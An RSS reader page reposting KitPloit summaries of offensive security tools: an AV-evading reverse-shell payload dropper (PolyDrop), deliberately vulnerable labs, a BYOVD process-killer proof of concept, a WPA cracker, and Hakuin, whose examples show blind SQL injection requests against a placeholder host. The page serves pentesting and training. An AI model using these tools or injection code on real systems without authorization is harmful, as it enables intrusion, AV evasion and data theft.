FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
☐ β˜† βœ‡ KitPloit - PenTest Tools!

PolyDrop - A BYOSI (Bring-Your-Own-Script-Interpreter) Rapid Payload Deployment Toolkit

By: Zion3R β€” September 23rd 2024 at 11:30


BYOSI

- Bring-Your-Own-Script-Interpreter

- Leveraging the abuse of trusted applications, one is able to deliver a compatible script interpreter for a Windows, Mac, or Linux system as well as malicious source code in the form of the specific script interpreter of choice. Once both the malicious source code and the trusted script interpeter are safely written to the target system, one could simply execute said source code via the trusted script interpreter.

PolyDrop

- Leverages thirteen scripting languages to perform the above attack.


The following langues are wholly ignored by AV vendors including MS-Defender: - tcl - php - crystal - julia - golang - dart - dlang - vlang - nodejs - bun - python - fsharp - deno

All of these languages were allowed to completely execute, and establish a reverse shell by MS-Defender. We assume the list is even longer, given that languages such as PHP are considered "dead" languages.

- Currently undetectable by most mainstream Endpoint-Detection & Response vendors.

The total number of vendors that are unable to scan or process just PHP file types is 14, and they are listed below:

  • Alibaba
  • Avast-Mobile
  • BitDefenderFalx
  • Cylance
  • DeepInstinct
  • Elastic
  • McAfee Scanner
  • Palo Alto Networks
  • SecureAge
  • SentinelOne (Static ML)
  • Symantec Mobile Insight
  • Trapmine
  • Trustlook
  • Webroot

And the total number of vendors that are unable to accurately identify malicious PHP scripts is 54, and they are listed below:

  • Acronis (Static ML)
  • AhnLab-V3
  • ALYac
  • Antiy-AVL
  • Arcabit
  • Avira (no cloud)
  • Baidu
  • BitDefender
  • BitDefenderTheta
  • ClamAV
  • CMC
  • CrowdStrike Falcon
  • Cybereason
  • Cynet
  • DrWeb
  • Emsisoft
  • eScan
  • ESET-NOD32
  • Fortinet
  • GData
  • Gridinsoft (no cloud)
  • Jiangmin
  • K7AntiVirus
  • K7GW
  • Kaspersky
  • Lionic
  • Malwarebytes
  • MAX
  • MaxSecure
  • NANO-Antivirus
  • Panda
  • QuickHeal
  • Sangfor Engine Zero
  • Skyhigh (SWG)
  • Sophos
  • SUPERAntiSpyware
  • Symantec
  • TACHYON
  • TEHTRIS
  • Tencent
  • Trellix (ENS)
  • Trellix (HX)
  • TrendMicro
  • TrendMicro-HouseCall
  • Varist
  • VBA32
  • VIPRE
  • VirIT
  • ViRobot
  • WithSecure
  • Xcitium
  • Yandex
  • Zillya
  • ZoneAlarm by Check Point
  • Zoner

With this in mind, and the absolute shortcomings on identifying PHP based malware we came up with the theory that the 13 identified languages are also an oversight by these vendors, including CrowdStrike, Sentinel1, Palo Alto, Fortinet, etc. We have been able to identify that at the very least Defender considers these obviously malicious payloads as plaintext.

Disclaimer

We as the maintainers, are in no way responsible for the misuse or abuse of this product. This was published for legitimate penetration testing/red teaming purposes, and for educational value. Know the applicable laws in your country of residence before using this script, and do not break the law whilst using this. Thank you and have a nice day.

EDIT

In case you are seeing all of the default declarations, and wondering wtf guys. There is a reason; this was built to be more moduler for later versions. For now, enjoy the tool and feel free to post issues. They'll be addressed as quickly as possible.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Damn-Vulnerable-Drone - An Intentionally Vulnerable Drone Hacking Simulator Based On The Popular ArduPilot/MAVLink Architecture, Providing A Realistic Environment For Hands-On Drone Hacking

By: Zion3R β€” September 21st 2024 at 11:30


The Damn Vulnerable Drone is an intentionally vulnerable drone hacking simulator based on the popular ArduPilot/MAVLink architecture, providing a realistic environment for hands-on drone hacking.


    About the Damn Vulnerable Drone


    What is the Damn Vulnerable Drone?

    The Damn Vulnerable Drone is a virtually simulated environment designed for offensive security professionals to safely learn and practice drone hacking techniques. It simulates real-world ArduPilot & MAVLink drone architectures and vulnerabilities, offering a hands-on experience in exploiting drone systems.

    Why was it built?

    The Damn Vulnerable Drone aims to enhance offensive security skills within a controlled environment, making it an invaluable tool for intermediate-level security professionals, pentesters, and hacking enthusiasts.

    Similar to how pilots utilize flight simulators for training, we can use the Damn Vulnerable Drone simulator to gain in-depth knowledge of real-world drone systems, understand their vulnerabilities, and learn effective methods to exploit them.

    The Damn Vulnerable Drone platform is open-source and available at no cost and was specifically designed to address the substantial expenses often linked with drone hardware, hacking tools, and maintenance. Its cost-free nature allows users to immerse themselves in drone hacking without financial concerns. This accessibility makes the Damn Vulnerable Drone a crucial resource for those in the fields of information security and penetration testing, promoting the development of offensive cybersecurity skills in a safe environment.

    How does it work?

    The Damn Vulnerable Drone platform operates on the principle of Software-in-the-Loop (SITL), a simulation technique that allows users to run drone software as if it were executing on an actual drone, thereby replicating authentic drone behaviors and responses.

    ArduPilot's SITL allows for the execution of the drone's firmware within a virtual environment, mimicking the behavior of a real drone without the need for physical hardware. This simulation is further enhanced with Gazebo, a dynamic 3D robotics simulator, which provides a realistic environment and physics engine for the drone to interact with. Together, ArduPilot's SITL and Gazebo lay the foundation for a sophisticated and authentic drone simulation experience.

    While the current Damn Vulnerable Drone setup doesn't mirror every drone architecture or configuration, the integrated tactics, techniques and scenarios are broadly applicable across various drone systems, models and communication protocols.

    Features

    • Docker-based Environment: Runs in a completely virtualized docker-based setup, making it accessible and safe for drone hacking experimentation.
    • Simulated Wireless Networking: Simulated Wifi (802.11) interfaces to practice wireless drone attacks.
    • Onboard Camera Streaming & Gimbal: Simulated RTSP drone onboard camera stream with gimbal and companion computer integration.
    • Companion Computer Web Interface: Companion Computer configuration management via web interface and simulated serial connection to Flight Controller.
    • QGroundControl/MAVProxy Integration: One-click QGroundControl UI launching (only supported on x86 architecture) with MAVProxy GCS integration.
    • MAVLink Router Integration: Telemetry forwarding via MAVLink Router on the Companion Computer Web Interface.
    • Dynamic Flight Logging: Fully dynamic Ardupilot flight bin logs stored on a simulated SD Card.
    • Management Web Console: Simple to use simulator management web console used to trigger scenarios and drone flight states.
    • Comprehensive Hacking Scenarios: Ideal for practicing a wide range of drone hacking techniques, from basic reconnaissance to advanced exploitation.
    • Detailed Walkthroughs: If you need help hacking against a particular scenario you can leverage the detailed walkthrough documentation as a spoiler.


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    VulnNodeApp - A Vulnerable Node.Js Application

    By: Zion3R β€” June 23rd 2024 at 12:30


    A vulnerable application made using node.js, express server and ejs template engine. This application is meant for educational purposes only.


    Setup

    Clone this repository

    git clone https://github.com/4auvar/VulnNodeApp.git

    Application setup:

    • Install the latest node.js version with npm.
    • Open terminal/command prompt and navigate to the location of downloaded/cloned repository.
    • Run command: npm install

    DB setup

    • Install and configure latest mysql version and start the mysql service/deamon
    • Login with root user in mysql and run below sql script:
    CREATE USER 'vulnnodeapp'@'localhost' IDENTIFIED BY 'password';
    create database vuln_node_app_db;
    GRANT ALL PRIVILEGES ON vuln_node_app_db.* TO 'vulnnodeapp'@'localhost';
    USE vuln_node_app_db;
    create table users (id int AUTO_INCREMENT PRIMARY KEY, fullname varchar(255), username varchar(255),password varchar(255), email varchar(255), phone varchar(255), profilepic varchar(255));
    insert into users(fullname,username,password,email,phone) values("test1","test1","test1","test1@test.com","976543210");
    insert into users(fullname,username,password,email,phone) values("test2","test2","test2","test2@test.com","9887987541");
    insert into users(fullname,username,password,email,phone) values("test3","test3","test3","test3@test.com","9876987611");
    insert into users(fullname,username,password,email,phone) values("test4","test4","test4","test4@test.com","9123459876");
    insert into users(fullname,username,password,email,phone) values("test5","test5","test 5","test5@test.com","7893451230");

    Set basic environment variable

    • User needs to set the below environment variable.
      • DATABASE_HOST (E.g: localhost, 127.0.0.1, etc...)
      • DATABASE_NAME (E.g: vuln_node_app_db or DB name you change in above DB script)
      • DATABASE_USER (E.g: vulnnodeapp or user name you change in above DB script)
      • DATABASE_PASS (E.g: password or password you change in above DB script)

    Start the server

    • Open the command prompt/terminal and navigate to the location of your repository
    • Run command: npm start
    • Access the application at http://localhost:3000

    Vulnerability covered

    • SQL Injection
    • Cross Site Scripting (XSS)
    • Insecure Direct Object Reference (IDOR)
    • Command Injection
    • Arbitrary File Retrieval
    • Regular Expression Injection
    • External XML Entity Injection (XXE)
    • Node js Deserialization
    • Security Misconfiguration
    • Insecure Session Management

    TODO

    • Will add new vulnerabilities such as CORS, Template Injection, etc...
    • Improve application documentation

    Issues

    • In case of bugs in the application, feel free to create an issues on github.

    Contribution

    • Feel free to create a pull request for any contribution.

    You can reach me out at @4auvar



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    XMGoat - Composed of XM Cyber terraform templates that help you learn about common Azure security issues

    By: Zion3R β€” June 22nd 2024 at 12:30


    XM Goat is composed of XM Cyber terraform templates that help you learn about common Azure security issues. Each template is a vulnerable environment, with some significant misconfigurations. Your job is to attack and compromise the environments.

    Here's what to do for each environment:

    1. Run installation and then get started.

    2. With the initial user and service principal credentials, attack the environment based on the scenario flow (for example, XMGoat/scenarios/scenario_1/scenario1_flow.png).

    3. If you need help with your attack, refer to the solution (for example, XMGoat/scenarios/scenario_1/solution.md).

    4. When you're done learning the attack, clean up.


    Requirements

    • Azure tenant
    • Terafform version 1.0.9 or above
    • Azure CLI
    • Azure User with Owner permissions on Subscription and Global Admin privileges in AAD

    Installation

    Run these commands:

    $ az login
    $ git clone https://github.com/XMCyber/XMGoat.git
    $ cd XMGoat
    $ cd scenarios
    $ cd scenario_<\SCENARIO>

    Where <\SCENARIO> is the scenario number you want to complete

    $ terraform init
    $ terraform plan -out <\FILENAME>
    $ terraform apply <\FILENAME>

    Where <\FILENAME> is the name of the output file

    Get started

    To get the initial user and service principal credentials, run the following query:

    $ terraform output --json

    For Service Principals, use application_id.value and application_secret.value.

    For Users, use username.value and password.value.

    Cleaning up

    After completing the scenario, run the following command in order to clean all the resources created in your tenant

    $ az login
    $ cd XMGoat
    $ cd scenarios
    $ cd scenario_<\SCENARIO>

    Where <\SCENARIO> is the scenario number you want to complete

    $ terraform destroy


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Extrude - Analyse Binaries For Missing Security Features, Information Disclosure And More...

    By: Zion3R β€” June 21st 2024 at 12:30


    Analyse binaries for missing security features, information disclosure and more.

    Extrude is in the early stages of development, and currently only supports ELF and MachO binaries. PE (Windows) binaries will be supported soon.


    Usage

    Usage:
    extrude [flags] [file]

    Flags:
    -a, --all Show details of all tests, not just those which failed.
    -w, --fail-on-warning Exit with a non-zero status even if only warnings are discovered.
    -h, --help help for extrude

    Docker

    You can optionally run extrude with docker via:

    docker run -v `pwd`:/blah -it ghcr.io/liamg/extrude /blah/targetfile

    Supported Checks

    ELF

    • PIE
    • RELRO
    • BIND NOW
    • Fortified Source
    • Stack Canary
    • NX Stack

    MachO

    • PIE
    • Stack Canary
    • NX Stack
    • NX Heap
    • ARC

    Windows

    Coming soon...

    TODO

    • Add support for PE
    • Add secret scanning
    • Detect packers


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    ROPDump - A Command-Line Tool Designed To Analyze Binary Executables For Potential Return-Oriented Programming (ROP) Gadgets, Buffer Overflow Vulnerabilities, And Memory Leaks

    By: Zion3R β€” June 4th 2024 at 12:30


    ROPDump is a tool for analyzing binary executables to identify potential Return-Oriented Programming (ROP) gadgets, as well as detecting potential buffer overflow and memory leak vulnerabilities.


    Features

    • Identifies potential ROP gadgets in binary executables.
    • Detects potential buffer overflow vulnerabilities by analyzing vulnerable functions.
    • Generates exploit templates to make the exploit process faster
    • Identifies potential memory leak vulnerabilities by analyzing memory allocation functions.
    • Can print function names and addresses for further analysis.
    • Supports searching for specific instruction patterns.

    Usage

    • <binary>: Path to the binary file for analysis.
    • -s, --search SEARCH: Optional. Search for specific instruction patterns.
    • -f, --functions: Optional. Print function names and addresses.

    Examples

    • Analyze a binary without searching for specific instructions:

    python3 ropdump.py /path/to/binary

    • Analyze a binary and search for specific instructions:

    python3 ropdump.py /path/to/binary -s "pop eax"

    • Analyze a binary and print function names and addresses:

    python3 ropdump.py /path/to/binary -f



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Reaper - Proof Of Concept On BYOVD Attack

    By: Zion3R β€” June 1st 2024 at 12:30


    Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate, vulnerable driver into a target system, which allows attackers to exploit the driver to perform malicious actions.

    Reaper was specifically designed to exploit the vulnerability present in the kprocesshacker.sys driver in version 2.8.0.0, taking advantage of its weaknesses to gain privileged access and control over the target system.

    Note: Reaper does not kill the Windows Defender process, as it has a protection, Reaper is a simple proof of concept.


    Features

    • Kill process
    • Suspend process

    Help

          ____
    / __ \___ ____ _____ ___ _____
    / /_/ / _ \/ __ `/ __ \/ _ \/ ___/
    / _, _/ __/ /_/ / /_/ / __/ /
    /_/ |_|\___/\__,_/ .___/\___/_/
    /_/

    [Coded by MrEmpy]
    [v1.0]

    Usage: C:\Windows\Temp\Reaper.exe [OPTIONS] [VALUES]
    Options:
    sp, suspend process
    kp, kill process

    Values:
    PROCESSID process id to suspend/kill

    Examples:
    Reaper.exe sp 1337
    Reaper.exe kp 1337

    Demonstration

    Install

    You can compile it directly from the source code or download it already compiled. You will need Visual Studio 2022 to compile.

    Note: The executable and driver must be in the same directory.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Ars0N-Framework - A Modern Framework For Bug Bounty Hunting

    By: Zion3R β€” May 31st 2024 at 12:30



    Howdy! My name is Harrison Richardson, or rs0n (arson) when I want to feel cooler than I really am. The code in this repository started as a small collection of scripts to help automate many of the common Bug Bounty hunting processes I found myself repeating. Over time, I built a simple web application with a MongoDB connection to manage my findings and identify valuable data points. After 5 years of Bug Bounty hunting, both part-time and full-time, I'm finally ready to package this collection of tools into a proper framework.


    The Ars0n Framework is designed to provide aspiring Application Security Engineers with all the tools they need to leverage Bug Bounty hunting as a means to learn valuable, real-world AppSec concepts and make πŸ’° doing it! My goal is to lower the barrier of entry for Bug Bounty hunting by providing easy-to-use automation tools in combination with educational content and how-to guides for a wide range of Web-based and Cloud-based vulnerabilities. In combination with my YouTube content, this framework will help aspiring Application Security Engineers to quickly and easily understand real-world security concepts that directly translate to a high paying career in Cyber Security.

    In addition to using this tool for Bug Bounty Hunting, aspiring engineers can also use this Github Repository as a canvas to practice collaborating with other developers! This tool was inspired by Metasploit and designed to be modular in a similar way. Each Script (Ex: wildfire.py or slowburn.py) is basically an algorithm that runs the Modules (Ex: fire-starter.py or fire-scanner.py) in a specific patter for a desired result. Because of this design, the community is free to build new Scripts to solve a specific use-case or Modules to expand the results of these Scripts. By learning the code in this framework and using Github to contribute your own code, aspiring engineers will continue to learn real-world skills that can be applied on the first day of a Security Engineer I position.

    My hope is that this modular framework will act as a canvas to help share what I've learned over my career to the next generation of Security Engineers! Trust me, we need all the help we can get!!


    Quick Start

    Paste this code block into a clean installation of Kali Linux 2023.4 to download, install, and run the latest stable Alpha version of the framework:

    sudo apt update && sudo apt-get update
    sudo apt -y upgrade && sudo apt-get -y upgrade
    wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
    tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
    rm ars0n-framework-v0.0.2-alpha.tar.gz
    cd ars0n-framework
    ./install.sh

    Download Latest Stable ALPHA Version

    wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
    tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
    rm ars0n-framework-v0.0.2-alpha.tar.gz

    Install

    The Ars0n Framework includes a script that installs all the necessary tools, packages, etc. that are needed to run the framework on a clean installation of Kali Linux 2023.4.

    Please note that the only supported installation of this framework is on a clean installation of Kali Linux 2023.3. If you choose to try and run the framework outside of a clean Kali install, I will not be able to help troubleshoot if you have any issues.

    ./install.sh

    This video shows exactly what to expect from a successful installation.

    If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts

    ./install.sh --arm

    You will be prompted to enter various API keys and tokens when the installation begins. Entering these is not required to run the core functionality of the framework. If you do not enter these API keys and tokens at the time of installation, simply hit enter at each of the prompts. The keys can be added later to the ~/.keys directory. More information about how to add these keys manually can be found in the Frequently Asked Questions section of this README.

    Run the Web Application (Client and Server)

    Once the installation is complete, you will be given the option to run the application by entering Y. If you choose not the run the application immediately, or if you need to run the application after a reboot, simply navigate to the root directly and run the run.sh bash script.

    ./run.sh

    If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts

    ./run.sh --arm

    Core Modules

    The Ars0n Framework's Core Modules are used to determine the basic scanning logic. Each script is designed to support a specific recon methodology based on what the user is trying to accomplish.

    Wildfire

    At this time, the Wildfire script is the most widely used Core Module in the Ars0n Framework. The purpose of this module is to allow the user to scan multiple targets that allow for testing on any subdomain discovered by the researcher.

    How it works:

    1. The user adds root domains through the Graphical User Interface (GUI) that they wish to scan for hidden subdomains
    2. Wildfire sorts each of these domains based on the last time they were scanned to ensure the domain with the oldest data is scanned first
    3. Wildfire scans each of the domains using the Sub-Modules based on the flags provided by the user.

    Most Wildfire scans take between 8 and 48 hours to complete against a single domain if all Sub-Modules are being run. Variations in this timing can be caused by a number of factors, including the target application and the machine running the framework.

    Also, please note that most data will not show in the GUI until the scan has completed. It's best to try and run the scan overnight or over a weekend, depending on the number of domains being scanned, and return once the scan has complete to move from Recon to Enumeration.

    Running Wildfire:

    Graphical User Interface (GUI)

    Wildfire can be run from the GUI using the Wildfire button on the dashboard. Once clicked, the front-end will use the checkboxes on the screen to determine what flags should be passed to the scanner.

    Please note that running scans from the GUI still has a few bugs and edge cases that haven't been sorted out. If you have any issues, you can simply run the scan form the CLI.

    Command Line Interface (CLI)

    All Core Modules for The Ars0n Framework are stored in the /toolkit directory. Simply navigate to the directory and run wildfire.py with the necessary flags. At least one Sub-Module flag must be provided.

    python3 wildfire.py --start --cloud --scan

    Slowburn

    Unlike the Wildfire module, which requires the user to identify target domains to scan, the Slowburn module does that work for you. By communicating with APIs for various bug bounty hunting platforms, this script will identify all domains that allow for testing on any discovered subdomain. Once the data has been populated, Slowburn will randomly choose one domain at a time to scan in the same way Wildfire does.

    Please note that the Slowburn module is still in development and is not considered part of the stable alpha release. There will likely be bugs and edge cases encountered by the user.

    In order for Slowburn to identify targets to scan, it must first be initialized. This initialization step collects the necessary data from various API's and deposits them into a JSON file stored locally. Once this initialization step is complete, Slowburn will automatically begin selecting and scanning one target at a time.

    To initalize Slowburn, simply run the following command:

    python3 slowburn.py --initialize

    Once the data has been collected, it is up to the user whether they want to re-initialize the tool upon the next scan.

    Remember that the scope and targets on public bug bounty programs can change frequently. If you choose to run Slowburn without initializing the data, you may be scanning domains that are no longer in scope for the program. It is strongly recommended that Slowburn be re-initialized each time before running.

    If you choose not to re-initialize the target data, you can run Slowburn using the previously collected data with the following command:

    python3 slowburn.py

    Sub-Modules

    The Ars0n Framework's Sub-Modules are designed to be leveraged by the Core Modules to divide the Recon & Enumeration phases into specific tasks. The data collected in each Sub-Module is used by the others to expand your picture of the target's attack surface.

    Fire-Starter

    Fire-Starter is the first step to performing recon against a target domain. The goal of this script is to collect a wealth of information about the attack surface of your target. Once collected, this data will be used by all other Sub-Modules to help the user identify a specific URL that is potentially vulnerable.

    Fire-Starter works by running a series of open-source tools to enumerate hidden subdomains, DNS records, and the ASN's to identify where those external entries are hosted. Currently, Fire-Starter works by chaining together the following widely used open-source tools:

    • Amass
    • Sublist3r
    • Assetfinder
    • Get All URL's (GAU)
    • Certificate Transparency Logs (CRT)
    • Subfinder
    • ShuffleDNS
    • GoSpider
    • Subdomainizer

    These tools cover a wide range of techniques to identify hidden subdomains, including web scraping, brute force, and crawling to identify links and JavaScript URLs.

    Once the scan is complete, the Dashboard will be updated and available to the user.

    Most Sub-Modules in The Ars0n Framework requre the data collected from the Fire-Starter module to work. With this in mind, Fire-Starter must be included in the first scan against a target for any usable data to be collected.

    Fire-Cloud

    Coming soon...

    Fire-Scanner

    Fire-Scanner uses the results of Fire-Starter and Fire-Cloud to perform Wide-Band Scanning against all subdomains and cloud services that have been discovered from previous scans.

    At this stage of development, this script leverages Nuclei almost exclusively for all scanning. Instead of simply running the tool, Fire-Scanner breaks the scan down into specific collections of Nuclei Templates and scans them one by one. This strategy helps ensure the scans are stable and produce consistent results, removes any unnecessary or unsafe scan checks, and produces actionable results.

    Troubleshooting

    The vast majority of issues installing and/or running the Ars0n Framework are caused by not installing the tool on a clean installation of Kali Linux.

    It is important to remember that, at its core, the Ars0n Framework is a collection of automation scripts designed to run existing open-source tools. Each of these tools have their own ways of operating and can experience unexpected behavior if conflicts emerge with any existing service/tool running on the user's system. This complexity is the reason why running The Ars0n Framework should only be run on a clean installation of Kali Linux.

    Another very common issue users experience is caused by MongoDB not successfully installing and/or running on their machine. The most common manifestation of this issue is the user is unable to add an initial FQDN and simply sees a broken GUI. If this occurs, please ensure that your machine has the necessary system requirements to run MongoDB. Unfortunately, there is no current solution if you run into this issue.

    Frequently Asked Questions

    Coming soon...



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Pyrit - The Famous WPA Precomputed Cracker

    By: Zion3R β€” May 28th 2024 at 12:30


    Pyrit allows you to create massive databases of pre-computed WPA/WPA2-PSK authentication phase in a space-time-tradeoff. By using the computational power of Multi-Core CPUs and other platforms through ATI-Stream,Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security-protocols.

    WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre shared key. This master key is derived from a password which the administrating user has to pre-configure e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate following traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home- and small-office-use at the cost of making the protocol vulnerable to brute-force-attacks against it's key negotiation phase; it allows to ultimately reveal the password that protects the network. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force-attacks even more alluring to the attacker. For more background see this article on the project's blog (Outdated).


    The author does not encourage or support using Pyrit for the infringement of peoples' communication-privacy. The exploration and realization of the technology discussed here motivate as a purpose of their own; this is documented by the open development, strictly sourcecode-based distribution and 'copyleft'-licensing.

    Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms including FreeBSD, MacOS X and Linux as operation-system and x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc-processors.

    Attacking WPA/WPA2 by brute-force boils down to to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10.000 PMKs per second is equivalent to hashing 9,8 gigabyte of data with SHA1 in one second.

    These are examples of how multiple computational nodes can access a single storage server over various ways provided by Pyrit:

    • A single storage (e.g. a MySQL-server)
    • A local network that can access the storage-server directly and provide four computational nodes on various levels with only one node actually accessing the storage server itself.
    • Another, untrusted network can access the storage through Pyrit's RPC-interface and provides three computional nodes, two of which actually access the RPC-interface.

    What's new

    • Fixed #479 and #481
    • Pyrit CUDA now compiles in OSX with Toolkit 7.5
    • Added use_CUDA and use_OpenCL in config file
    • Improved cores listing and managing
    • limit_ncpus now disables all CPUs when set to value <= 0
    • Improve CCMP packet identification, thanks to yannayl

    See CHANGELOG file for a better description.

    How to use

    Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.

    How to participate

    You may want to read this wiki-entry if interested in porting Pyrit to new hardware-platform. Contributions or bug reports you should [submit an Issue] (https://github.com/JPaulMora/Pyrit/issues).



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Hakuin - A Blazing Fast Blind SQL Injection Optimization And Automation Framework

    By: Zion3R β€” May 15th 2024 at 01:56


    Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.

    Hakuin has been presented at esteemed academic and industrial conferences: - BlackHat MEA, Riyadh, 2023 - Hack in the Box, Phuket, 2023 - IEEE S&P Workshop on Offsensive Technology (WOOT), 2023

    More information can be found in our paper and slides.


    Installation

    To install Hakuin, simply run:

    pip3 install hakuin

    Developers should install the package locally and set the -e flag for editable mode:

    git clone git@github.com:pruzko/hakuin.git
    cd hakuin
    pip3 install -e .

    Examples

    Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester and override the request method. Also, the method must determine whether the query resolved to True or False.

    Example 1 - Query Parameter Injection with Status-based Inference
    import aiohttp
    from hakuin import Requester

    class StatusRequester(Requester):
    async def request(self, ctx, query):
    r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
    return r.status == 200
    Example 2 - Header Injection with Content-based Inference
    class ContentRequester(Requester):
    async def request(self, ctx, query):
    headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
    r = await aiohttp.get(f'http://vuln.com/', headers=headers)
    return 'found' in await r.text()

    To start extracting data, use the Extractor class. It requires a DBMS object to contruct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

    Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL
    import asyncio
    from hakuin import Extractor, Requester
    from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

    class StatusRequester(Requester):
    ...

    async def main():
    # requester: Use this Requester
    # dbms: Use this DBMS
    # n_tasks: Spawns N tasks that extract column rows in parallel
    ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
    ...

    if __name__ == '__main__':
    asyncio.get_event_loop().run_until_complete(main())

    Now that eveything is set, you can start extracting DB metadata.

    Example 1 - Extracting DB Schemas
    # strategy:
    # 'binary': Use binary search
    # 'model': Use pre-trained model
    schema_names = await ext.extract_schema_names(strategy='model')
    Example 2 - Extracting Tables
    tables = await ext.extract_table_names(strategy='model')
    Example 3 - Extracting Columns
    columns = await ext.extract_column_names(table='users', strategy='model')
    Example 4 - Extracting Tables and Columns Together
    metadata = await ext.extract_meta(strategy='model')

    Once you know the structure, you can extract the actual content.

    Example 1 - Extracting Generic Columns
    # text_strategy:    Use this strategy if the column is text
    res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
    Example 2 - Extracting Textual Columns
    # strategy:
    # 'binary': Use binary search
    # 'fivegram': Use five-gram model
    # 'unigram': Use unigram model
    # 'dynamic': Dynamically identify the best strategy. This setting
    # also enables opportunistic guessing.
    res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
    Example 3 - Extracting Integer Columns
    res = await ext.extract_column_int(table='users', column='id')
    Example 4 - Extracting Float Columns
    res = await ext.extract_column_float(table='products', column='price')
    Example 5 - Extracting Blob (Binary Data) Columns
    res = await ext.extract_column_blob(table='users', column='id')

    More examples can be found in the tests directory.

    Using Hakuin from the Command Line

    Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:

    python3 hk.py -h

    For Researchers

    This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

    Cite Hakuin

    @inproceedings{hakuin_bsqli,
    title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
    author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
    booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
    pages={384--393},
    year={2023},
    organization={IEEE}
    }


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Ioctlance - A Tool That Is Used To Hunt Vulnerabilities In X64 WDM Drivers

    By: Zion3R β€” May 8th 2024 at 12:30

    Description

    Presented at CODE BLUE 2023, this project titled Enhanced Vulnerability Hunting in WDM Drivers with Symbolic Execution and Taint Analysis introduces IOCTLance, a tool that enhances its capacity to detect various vulnerability types in Windows Driver Model (WDM) drivers. In a comprehensive evaluation involving 104 known vulnerable WDM drivers and 328 unknow n ones, IOCTLance successfully unveiled 117 previously unidentified vulnerabilities within 26 distinct drivers. As a result, 41 CVEs were reported, encompassing 25 cases of denial of service, 5 instances of insufficient access control, and 11 examples of elevation of privilege.


    Features

    Target Vulnerability Types

    • map physical memory
    • controllable process handle
    • buffer overflow
    • null pointer dereference
    • read/write controllable address
    • arbitrary shellcode execution
    • arbitrary wrmsr
    • arbitrary out
    • dangerous file operation

    Optional Customizations

    • length limit
    • loop bound
    • total timeout
    • IoControlCode timeout
    • recursion
    • symbolize data section

    Build

    Docker (Recommand)

    docker build .

    Local

    dpkg --add-architecture i386
    apt-get update
    apt-get install git build-essential python3 python3-pip python3-dev htop vim sudo \
    openjdk-8-jdk zlib1g:i386 libtinfo5:i386 libstdc++6:i386 libgcc1:i386 \
    libc6:i386 libssl-dev nasm binutils-multiarch qtdeclarative5-dev libpixman-1-dev \
    libglib2.0-dev debian-archive-keyring debootstrap libtool libreadline-dev cmake \
    libffi-dev libxslt1-dev libxml2-dev

    pip install angr==9.2.18 ipython==8.5.0 ipdb==0.13.9

    Analysis

    # python3 analysis/ioctlance.py -h
    usage: ioctlance.py [-h] [-i IOCTLCODE] [-T TOTAL_TIMEOUT] [-t TIMEOUT] [-l LENGTH] [-b BOUND]
    [-g GLOBAL_VAR] [-a ADDRESS] [-e EXCLUDE] [-o] [-r] [-c] [-d]
    path

    positional arguments:
    path dir (including subdirectory) or file path to the driver(s) to analyze

    optional arguments:
